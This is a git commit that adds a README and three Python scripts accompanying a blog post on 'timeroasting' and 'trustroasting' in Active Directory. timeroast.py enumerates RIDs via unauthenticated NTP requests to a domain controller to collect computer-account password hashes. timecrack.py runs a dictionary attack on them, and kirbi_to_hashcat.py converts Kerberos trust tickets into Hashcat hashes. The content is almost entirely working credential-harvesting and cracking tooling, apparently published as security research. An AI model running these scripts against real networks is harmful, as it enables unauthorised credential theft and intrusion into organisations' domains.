Added README and scripts.

TomTervoortSecura · TomTervoortSecura · commit 79b4c537a164 · 2023-01-18T10:40:09.000+01:00
diff --git a/README.md b/README.md
@@ -0,0 +1,36 @@
+Timeroast and Trustroast scripts
+================================
+
+Python scripts accompanying the blog post _Timeroasting, trustroasting and computer spraying: taking advantage of weak computer and trust account passwords in Active Directory_. These support the _timeroasting_ and _trustroasting_ attack techniques by discovering weak computer or trust passwords within an Active Directory domain.
+
+How to run
+----------
+
+Both scripts require Python 3.6 or higher. No installation is required. The Timeroasting scripts have no further 
+dependencies and the Trustroast scripts solely depends on [Impact](https://github.com/fortra/impacket).
+
+Run each script with `-h` for usage instructions.
+
+Timeroasting
+------------
+
+![Timeroasting example screenshot](img1.png)
+
+Timeroasting takes advantage of the Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.
+
+Two scripts are included:
+
+- `timeroast.py`: given a DC domain name or IP, will attempt to get 'NTP hashes' of the computer accounts in the domain by enumerating RID's. Requires root privileges in order to be able to receive NTP responses.
+- `timecrack.py`: performs a simple, unoptimized, dictionary attack on the results of `timeroast.py`. 
+
+I am currently looking at getting support for Timeroasted hashes into an optimized hash cracking tool. If that succeeds, I will add support for that tool's input format and `timecrack.py` will become obsolete.
+
+
+Trustroasting
+-------------
+
+![Example screenshot of kirbi_to_hashcat.py](img2.png)
+
+I currently have not implemented a convenient `trustroast.py` script that will automatically enumerate trusts and fetch tickets. However, this can easily be achieved with [Rubeus](https://github.com/GhostPack/Rubeus) in the way described in the blog post. I did add a simple script which converts Rubeus' output format into something you can slot into Hashcat:
+
+- `kirbi_to_hashcat.py`: converts a Kerberos ticket (referall/trust, service, ticket-granting, etc.) that is encoded as a base64 KRB_CRED structure into a Hashcat format. Hash types 13100, 19600, 19700 (RC-4 and AES tickets) are supported.
diff --git a/img1.png b/img1.png
diff --git a/img2.png b/img2.png
diff --git a/timeroast/timecrack.py b/timeroast/timecrack.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+
+"""Perform a simple dictionary attack against the output of timeroast.py. Neccessary because the NTP 'hash' format 
+unfortunately does not fit into Hashcat or John right now.
+
+Not even remotely optimized, but still useful for cracking legacy default passwords (where the password is the computer 
+name) or specific default passwords that are popular in an organisation.
+"""
+
+from binascii import hexlify, unhexlify
+from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
+import hashlib, sys
+
+def compute_hash(password, salt):
+  """Compute a legacy NTP authenticator 'hash'."""
+  return hashlib.md5(hashlib.new('md4', password.encode('utf-16le')).digest() + salt).digest()
+
+def try_crack(hashfile, dictfile):
+  # Try each dictionary entry for each hash. dictfile is read iteratively while hashfile is stored in RAM.
+  hashes = [line.strip().split(':', 3) for line in hashfile if line.strip()]
+  hashes = [(int(rid), unhexlify(hashval), unhexlify(salt)) for [rid, hashval, salt] in hashes]
+  for password in dictfile:
+    password = password.strip()
+    for rid, hashval, salt in hashes:
+      if compute_hash(password, salt) == hashval:
+        yield rid, password
+
+def main():
+  argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=\
+"""Perform a simple dictionary attack against the output of timeroast.py. 
+Neccessary because the NTP 'hash' format unfortunately does not fit into Hashcat
+or John right now.
+
+Not even remotely optimized, but still useful for cracking legacy default 
+passwords (where the password is the computer name) or specific default 
+passwords that are popular in an organisation.
+""")
+
+  argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py')
+  argparser.add_argument('dictionary', type=FileType('r'), help='Line-delimited password dictionary')
+  args = argparser.parse_args()
+
+  crackcount = 0
+  for rid, password in try_crack(args.hashes, args.dictionary):
+    print(f'[+] Cracked RID {rid} password: {password}')
+    crackcount += 1
+
+  print(f'\n{crackcount} passwords recovered.')
+
+if __name__ == '__main__':
+  main()
+
+
diff --git a/timeroast/timeroast.py b/timeroast/timeroast.py
@@ -0,0 +1,145 @@
+#!/usr/bin/env python3
+
+from binascii import hexlify, unhexlify
+from argparse import ArgumentParser, FileType, ArgumentTypeError, RawDescriptionHelpFormatter
+from typing import *
+from select import select
+from time import time
+from sys import stdout, stderr
+from itertools import chain
+from socket import socket, AF_INET, SOCK_DGRAM
+from struct import pack, unpack
+
+# Static NTP query prefix using the MD5 authenticator. Append 4-byte RID and dummy checksum to create a full query.
+NTP_PREFIX = unhexlify('db0011e9000000000001000000000000e1b8407debc7e50600000000000000000000000000000000e1b8428bffbfcd0a')
+
+# Default settings.
+DEFAULT_RATE = 180
+DEFAULT_GIVEUP_TIME = 24
+
+
+def ntp_roast(dc_host : str, rids : Iterable, rate : int, giveup_time : float) -> List[Tuple[int, bytes, bytes]]:
+  """Gathers MD5(MD4(password) || NTP-response[:48]) hashes for a sequence of RIDs.
+     Rate is the number of queries per second to send.
+     Will quit when either rids ends or no response has been received in giveup_time seconds. Note that the server will 
+     not respond to queries with non-existing RIDs, so it is difficult to distinguish nonexistent RIDs from network 
+     issues.
+     
+     Yields (rid, hash, salt) pairs, where salt is the NTP response data."""
+
+  # Bind UDP socket.
+  with socket(AF_INET, SOCK_DGRAM) as sock:
+    sock.bind(('0.0.0.0', 123))
+
+    query_interval = 1 / rate
+    last_ok_time = time()
+    rids_received = set()
+    rid_iterator = iter(rids)
+
+    while time() < last_ok_time + giveup_time:
+      
+      # Send out query for the next RID, if any.
+      query_rid = next(rid_iterator, None)
+      if query_rid is not None:
+        query = NTP_PREFIX + pack('<I', query_rid) + b'\x00' * 16
+        sock.sendto(query, (dc_host, 123))
+
+      # Wait for either a response or time to send the next query.
+      ready, [], [] = select([sock], [], [], query_interval)
+      if ready:
+        reply = sock.recvfrom(120)[0]
+
+        # Extract RID, hash and "salt" if succesful.
+        if len(reply) == 68:
+          salt = reply[:48]
+          answer_rid = unpack('<I', reply[-20:-16])[0]
+          md5hash = reply[-16:]
+
+          # Filter out duplicates.
+          if answer_rid not in rids_received:
+            rids_received.add(answer_rid)
+            yield (answer_rid, md5hash, salt)
+          last_ok_time = time()
+
+def get_args():
+  """Parse command-line arguments."""
+
+  argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=\
+"""Performs an NTP 'Timeroast' attack against a domain controller. 
+Outputs hex encoded<RID>:<hash>:<salt> triplets where the 'hash' is 
+defined as MD5(NTLM-hash || salt).
+
+The timecrack.py script can be used to run a dictionary attack against the 
+hashes.
+
+Usernames within the hash file are user RIDs. In order to use a cracked 
+password that does not contain the computer name, either look up the RID
+in AD (if you already have some account) or use a computer name list obtained
+via reverse DNS, service scanning, SMB NULL sessions etc.
+"""
+  )
+
+
+  def num_ranges(arg):
+    # Comma-seperated integer ranges.
+    try:
+      ranges = []
+      for part in arg.split(','):
+        if '-' in part:
+          [start, end] = part.split('-')
+          assert 0 <= int(start) < int(end) < 2**31
+          ranges.append(range(int(start), int(end) + 1))
+        else:
+          assert 0 <= int(part) < 2**31
+          ranges.append(int(part))
+
+      return chain(ranges)
+    except:
+      raise ArgumentTypeError(f'Invalid number ranges: "{arg}".')
+
+
+  # Configurable options.
+  argparser.add_argument(
+    '-o', '--out', 
+    type=FileType('w'), default=stdout, metavar='FILE', 
+    help='Hash output file. Writes to stdout if omitted.'
+  )
+  argparser.add_argument(
+    '-r', '--rids',
+    type=num_ranges, default=range(1, 2**31), metavar='RIDS',
+    help='Comma-separated list of RIDs to try. Use hypens to specify (inclusive) ranges, e.g. "512-580,600-1400". ' +\
+         'By default, all possible RIDs will be tried until timeout.'
+  )
+  argparser.add_argument(
+    '-a', '--rate',
+    type=int, default=DEFAULT_RATE, metavar='RATE',
+    help=f'NTP queries to execute second per second. Higher is faster, but with a greater risk of dropped packages ' +\
+         f'resulting in incomplete results. Default: {DEFAULT_RATE}.'
+  )
+  argparser.add_argument(
+    '-t', '--timeout',
+    type=int, default=DEFAULT_GIVEUP_TIME, metavar='TIMEOUT',
+    help=f'Quit after not receiving NTP responses for TIMEOUT seconds, possibly indicating that RID space has ' +\
+         f'been exhausted. Default: {DEFAULT_GIVEUP_TIME}.'
+  )
+
+  # Required arguments.
+  argparser.add_argument(
+    'dc',
+    help='Hostname or IP address of domain controller that acts as NTP server.'
+  )
+
+  return argparser.parse_args()
+
+
+def main():
+  """Command-line interface."""
+  
+  args = get_args()
+  output = args.out
+  for rid, hashval, salt in ntp_roast(args.dc, args.rids, args.rate, args.timeout):
+    print(f'{rid}:{hexlify(hashval).decode()}:{hexlify(salt).decode()}', file=output)
+  
+
+if __name__ == '__main__':
+  main()
diff --git a/trustroast/kirbi_to_hashcat.py b/trustroast/kirbi_to_hashcat.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python3
+
+"""Simple script that extracts the first ticket from a base64 encoded KRB_CRED structure (i.e. Rubeus' asktgs 
+output) and then outputs it in Hashcat format"""
+
+from pyasn1.codec.der import decoder
+from impacket.krb5.asn1 import KRB_CRED
+from binascii import hexlify
+import sys
+from base64 import b64encode, b64decode
+from argparse import ArgumentParser, RawDescriptionHelpFormatter, FileType
+
+argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=\
+"""Converts a Kerberos ticket from a base64 encoded KRB_CRED format to a Hashcat
+$krb5tgs$ hash. The main use case is brute-forcing trust passwords based on a 
+trust ticket retrieved with a tool such as Rubeus.
+
+If the KRB_CRED input contains multiple tickets, the first one is taken. Output 
+is written to STDOUT.
+""")
+argparser.add_argument('file', type=FileType('r'), default=sys.stdin, nargs='?', \
+  help='Input file (STDIN if omitted)')
+args = argparser.parse_args()
+
+# Parse base64 encoded KRB_CRED.
+data = b64decode(args.file.read())
+creds = decoder.decode(data, asn1Spec=KRB_CRED())[0]
+
+# Take the first ticket from the store.
+ticket = creds['tickets'][0]
+
+# Extract components relevant for cracking.
+realm = ticket['realm']
+sname = '/'.join(str(s) for s in ticket['sname']['name-string'])
+enctype = ticket['enc-part']['etype']
+ciphertext = hexlify(ticket['enc-part']['cipher'].asOctets()).decode()
+
+if enctype == 23:
+  # RC4 ticket.
+  print(f'$krb5tgs${enctype}$*USERNAME${realm}${sname}*${ciphertext[:32]}${ciphertext[32:]}')
+elif enctype == 17 or enctype == 18:
+  # AES ticket.
+  print(f'$krb5tgs${enctype}$USERNAME${realm}$*{sname}*${ciphertext[:32]}${ciphertext[32:]}')
+else:
+  raise Exception(f'Unsupported encryption type: {enctype}')
